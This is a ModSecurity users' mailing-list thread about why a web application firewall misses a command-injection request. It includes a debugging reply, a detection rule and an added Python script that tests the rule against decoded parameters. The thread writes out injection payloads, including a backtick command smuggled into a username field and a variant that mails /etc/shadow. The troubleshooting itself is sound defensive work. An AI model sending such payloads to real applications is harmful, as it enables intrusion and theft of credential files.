On Fri, Aug 16, 2013 at 3:18 AM, rewt rewt <rewt@linux-elite.org> wrote:
Hello,
I have a big issue with ModSecurity detecting a simple Remote Command Execution.
My WAF config is ModSecurity 2.7.1 with core rules based on scoring; however, I don't have any logging for that request:

GET http://OBFUSCATED/application.pl?action=deleteaccount&username=%60ls%20/root/%20%3E%20/tmp/root%60&redirectionemail= HTTP/1.1

(also work for mail my@email.Com < /etc/shadow)

It is simply not detected in the logs!!!
I clearly don't understand why... it should be triggered by the "common attack" rules of the activated CRS rules, in my opinion.


The CRS does detect that attack, as seen here:
http://www.modsecurity.org/demo/demo-deny.html?test=username%3D%60ls+%2Froot%2F+%3E+%2Ftmp%2Froot%60%26redirectionemail%3D
 
Can you increase your debug log level to 9 and send me your debug log privately?


I tried this without success:
SecRule ARGS "(;|\||\`)" "phase:3,t:none,log,deny,id:5000148"

As an aside, it's normally a good idea to stop an attack at the first point possible. For the ARGS collection that is in phase 2. Having said that, your rule above works as expected:

#curl localhost/test?abc=%3B

# less /opt/modsecurity/var/log/debug.log
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][5] Rule 7f3cf08e3e90: SecRule "ARGS" "@rx (;|\\||\\`)" "phase:3,auditlog,t:none,log,deny,id:5000148"
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Transformation completed in 0 usec.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Executing operator "rx" with param "(;|\\||\\`)" against ARGS:abc.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][9] Target value: ";"
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][6] Ignoring regex captures since "capture" action is not enabled.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Operator completed in 34 usec.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Rule returned 1.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][9] Match, intercepted -> returning.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][1] Access denied with code 403 (phase 3). Pattern match "(;|\\||\\`)" at ARGS:abc. [file "/opt/modsecurity/etc/rules.conf"] [line "9"] [id "5000148"]

--
 - Josh
 
and

SecRule ARGS ";" "phase:3,t:none,log,deny,id:5000148"
(I tried it with phase 2 or 1; the attack still succeeds)

Another interesting option could be to increase the score only for that virtual host, but I don't think it would be helpful as it is not detected.

Any help would be much appreciated!

Many thanks

David R
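To check what the rule in this thread would actually see, here is a small added script (not from either poster, not ModSecurity code) that emulates how the ARGS collection is built from a GET request: the query string is split and URL-decoded, and the rule's regex `(;|\||\`)` is run against each decoded value. It uses the request line quoted above, and a second request line constructed here to carry the "mail ... < /etc/shadow" variant also mentioned in the thread. Both request lines and the function names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# The operator from the thread's rule: SecRule ARGS "(;|\||\`)" ...
# ModSecurity evaluates @rx against each ARGS value after URL decoding.
RULE_REGEX = re.compile(r"(;|\||`)")

# The request line quoted in the thread (host already obfuscated there).
REQUEST_LINE = (
    "GET http://OBFUSCATED/application.pl?action=deleteaccount"
    "&username=%60ls%20/root/%20%3E%20/tmp/root%60&redirectionemail= HTTP/1.1"
)

# Constructed request line for the second payload the poster mentions
# ("mail my@email.Com < /etc/shadow"); not taken verbatim from the thread.
MAIL_VARIANT = (
    "GET /application.pl?action=deleteaccount"
    "&username=mail%20my%40email.Com%20%3C%20/etc/shadow&redirectionemail= HTTP/1.1"
)


def extract_args(request_line):
    """Return the decoded ARGS collection as a list of (name, value) pairs.

    Only the query string of a GET request line is considered here; a POST
    body would add further ARGS in ModSecurity but is out of scope for this check.
    """
    _method, target, _version = request_line.split(" ", 2)
    query = urlsplit(target).query
    # keep_blank_values so an empty argument such as "redirectionemail=" still appears
    return parse_qsl(query, keep_blank_values=True)


def matching_args(request_line, regex=RULE_REGEX):
    """Names of ARGS whose decoded value the rule's regex would match."""
    return [name for name, value in extract_args(request_line) if regex.search(value)]


if __name__ == "__main__":
    for line in (REQUEST_LINE, MAIL_VARIANT):
        print(line)
        for name, value in extract_args(line):
            print(f"  ARGS:{name} = {value!r}")
        print("  rule would match:", matching_args(line) or "nothing")
```

Run as-is: for the quoted request the decoded `ARGS:username` contains backticks, so the regex matches and the rule would fire once it is actually loaded and reached in the configured phase, which is consistent with the debug log shown above and points at configuration or logging rather than the pattern. For the second variant the decoded value contains none of `;`, `|` or a backtick, so this particular rule would not match it even when working; that variant relies on the broader CRS command-injection rules instead.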


_______________________________________________
mod-security-users mailing list
mod-security-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/mod-security-users